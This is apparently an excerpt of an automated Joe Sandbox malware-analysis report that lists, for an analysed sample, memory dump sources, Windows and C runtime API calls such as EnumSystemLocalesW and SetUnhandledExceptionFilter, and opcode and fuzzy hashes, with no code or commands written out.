                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0062174A: GetLastError.KERNEL32(?,00000000,0061E09F,?,?,?,?,00000003,0061B5E5,?,0061B554,00000000,00000016,0061B763), ref: 0062174E
                                                                                                                                                                                                                        • Part of subcall function 0062174A: SetLastError.KERNEL32(00000000,00000016,0061B763,?,?,?,?,?,00000000), ref: 006217F0
                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00629F87,00000001,?,?,-00000050,?,0062A329,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00629CF3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0061B934: EnterCriticalSection.KERNEL32(-00699CC8,?,0061E42A,00000000,00636800,0000000C,0061E3F1,?,?,00622176,?,?,006218E8,00000001,00000364,00000000), ref: 0061B943
                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00621A35,00000001,006369D0,0000000C,00621DE8,00000000), ref: 00621A7A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1272433827-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0062174A: GetLastError.KERNEL32(?,00000000,0061E09F,?,?,?,?,00000003,0061B5E5,?,0061B554,00000000,00000016,0061B763), ref: 0062174E
                                                                                                                                                                                                                        • Part of subcall function 0062174A: SetLastError.KERNEL32(00000000,00000016,0061B763,?,?,?,?,?,00000000), ref: 006217F0
                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00629B1C,00000001,?,?,?,0062A387,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00629BFA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2417226690-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0000795E,00616DE9), ref: 00617957
Memory Dump Source
• Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_610000_file.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_610000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID: Z81xbyuAua
• API String ID: 0-3121583705
APIs
Memory Dump Source
• Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_610000_file.jbxd
Yara matches
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
Memory Dump Source
• Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_610000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_610000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_610000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                      • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                                      • Instruction ID: adb11c5af0447c6f57d8a86920c573b2e19a3f844861f791048fcc4ae0d2e111
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63C17B33D0A9F2498B36863E44592BAEFA36F91B4171F8395DCD13F289D623AD0196D0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                      • Instruction ID: 50341b1126a710826d241bef76fd9381c4c2273111a826c7694dffe94f9f72cc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2C16D73D0A9F2498B36823D84192BAEFA36F91B4171BC395CCD13F289D627AD05D6D0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
Similarity
• API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
• String ID:
• API String ID: 3471368781-0
Memory Dump Source
• Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 5566999e0ab72da053a8abcc3324ddc8aa4becb6fcadd465fa76c36a84b4dcdd
                                                                                                                                                                                                                      • Instruction ID: 35b93fd8a1e5cb227e5d15a8d5c7377c53f893a43ff8787a8901f9e5ab93a24c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5566999e0ab72da053a8abcc3324ddc8aa4becb6fcadd465fa76c36a84b4dcdd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2CE08C72919638EBCB14DB88DA04E8AF3EDEB45B10F15089AF501D3210C270DE00CBD0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                                                      • Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 36ee60ac244e19e894879db150e4a877eeafaa5209d97bbfc198eca8377c3515
                                                                                                                                                                                                                      • Instruction ID: a075c0edec25dbe1a682ce445492b8fbcfcc92255e0ce4b041d7801e746d56fb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36ee60ac244e19e894879db150e4a877eeafaa5209d97bbfc198eca8377c3515
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4D0953A605A509FC310CF0AE440945F7B9FB99A30B1682A6E905A3B20C334FC02CAE0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a143222fbadcdda3babb2bd23adbde204d1ca1d3ff22d9f4b52ceee6d3db84ec
                                                                                                                                                                                                                      • Instruction ID: 8633b6ecb3f4207bcba4e8ebac2da71898ef8bee2188e04957f85f2c9e4c1036
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a143222fbadcdda3babb2bd23adbde204d1ca1d3ff22d9f4b52ceee6d3db84ec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EC08C34400F0087CE39891082B27E43356A391782F8818CCC8030B782C62FDCC3DA50
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                                                      • Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • operator+.LIBCMT ref: 0065A44B
                                                                                                                                                                                                                        • Part of subcall function 0065755A: DName::DName.LIBCMT ref: 0065756D
                                                                                                                                                                                                                        • Part of subcall function 0065755A: DName::operator+.LIBCMT ref: 00657574
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: NameName::Name::operator+operator+
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2937105810-0

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Name::operator+=$Decorator::getNameName::Name::operator+Name::operator=Type$Dataoperator+
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1129569759-0

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2193103758-0

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 006153AE
                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 006153B8
                                                                                                                                                                                                                      • int.LIBCPMT ref: 006153CF
                                                                                                                                                                                                                        • Part of subcall function 006116AA: std::_Lockit::_Lockit.LIBCPMT ref: 006116BB
                                                                                                                                                                                                                        • Part of subcall function 006116AA: std::_Lockit::~_Lockit.LIBCPMT ref: 006116D5
                                                                                                                                                                                                                      • codecvt.LIBCPMT ref: 006153F2
                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00615409
                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00615429
                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00615436
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
